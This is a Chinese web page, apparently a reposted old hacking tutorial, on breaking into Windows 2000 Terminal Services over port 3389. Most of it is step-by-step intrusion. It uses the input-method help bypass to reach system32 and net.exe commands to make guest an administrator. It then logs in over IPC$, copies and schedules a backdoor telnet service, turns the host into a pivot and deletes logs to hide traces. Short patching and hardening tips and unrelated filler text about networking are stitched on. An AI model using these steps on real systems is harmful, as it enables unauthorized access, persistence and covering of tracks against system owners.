争怎路由网/杀毒教程/内容

win2k的3389端口攻击

杀毒教程2024-02-18 阅读
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。

WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。 
WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。 
工具:客户端连接管理器,下载地址:自己找吧,天天有好几种呢。 
入侵步骤: 
一,获得管理员账号。 
我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:\winnt\system32"。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。 
现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:\winnt\system32\net.exe后面空一格,填入"user guest /active :yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用"user 用户名密码/add",创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"user guest 密码",运行,于是guest便有了密码。最后,再次修改,填入“localgroup administrators guest /add,将guest变成系统管理员。 
注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。 
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。 
3、你所看到的图像与操作会有所延迟,这受网速的影响。 

二,创建跳板。 
再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft 网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。 
退出对方系统,在本地机命令提示符下,输入 
net use \\IP Address\IPC$ ["password"] /user:"guset",通过IPC的远程登陆就成功了。 
登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。 
copy c:\hack\srv.exe \\***.***.***.***\admin$ 
然后利用定时服务启动它,先了解对方的时间: 
net time \\***.***.***.*** 
显示: 
\\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 
命令成功完成。 
然后启动srv.exe: 
at \\***.***.***.*** 09:00 srv.exe 
显示: 
新加了一项作业,其作业 ID = 0 
过几分钟后,telnet ***.***.***.*** 99 
这里不需要验证身份,直接登录,显示: 
c:\winnt:\system32> 
我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入: 
copy c:\hack\ntlm.exe \\211.21.193.202\admin$ 
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exe 
C:\WINNT\system32>ntlm 
显示: 
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. 
Done! 
C:\WINNT\system32> 
C:\WINNT\system32> 
好,现在我们来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务: 
net stop telnet系统告诉你并没有启动telnet,不理它,继续: 
net start telnet这次真的启动了telnet,我们可以在另开的命令提示符窗口telnet到对方的 
23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。 
三、扫除脚印: 
删除为net.exe 创建的快捷方式,删除winnt\system32\logfiles下边的日志文件 

补漏方法: 
1、打补丁 
2、删除输入法帮助文件 
3、停止终端服务。
win 2000 sever 3389安全问题解决办法

正确的做法:
windowsupdate.microsoft.com把所有关键更新全部更新,然后注意管理员密码要在8位以上数字字母混合,最好有符号!(这点非常重要,符号就是!%#$&这些啦。),然后要做的是(前提你这台机器不需要在局域网里被别的机器访问)创建一个run.bat文件,里面打上如下内容:
net share ipc$ /del
net share admin$ /del
net share c$ /del
net share d$ /del
。。。。。有几个分区写几个,保存到启动菜单里。
然后呢禁用runas service,remote registry service,task sheduler,dns,dhcp等服务最好也设置成手动,qouta,daytime等服务一定关掉以免被DOS,在iis里删掉.ida,.idq,.printer的映射,用ipsec过滤掉外网访问135、139、445、3389端口
还有要注意如果装了mssql要把sa默认空密码改掉,mysql的root密码改掉
还有如果你的网站有上传附件的功能请注意过滤扩展名!最好不要用phpbb论坛,最近发现了漏洞。

网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。



……

相关阅读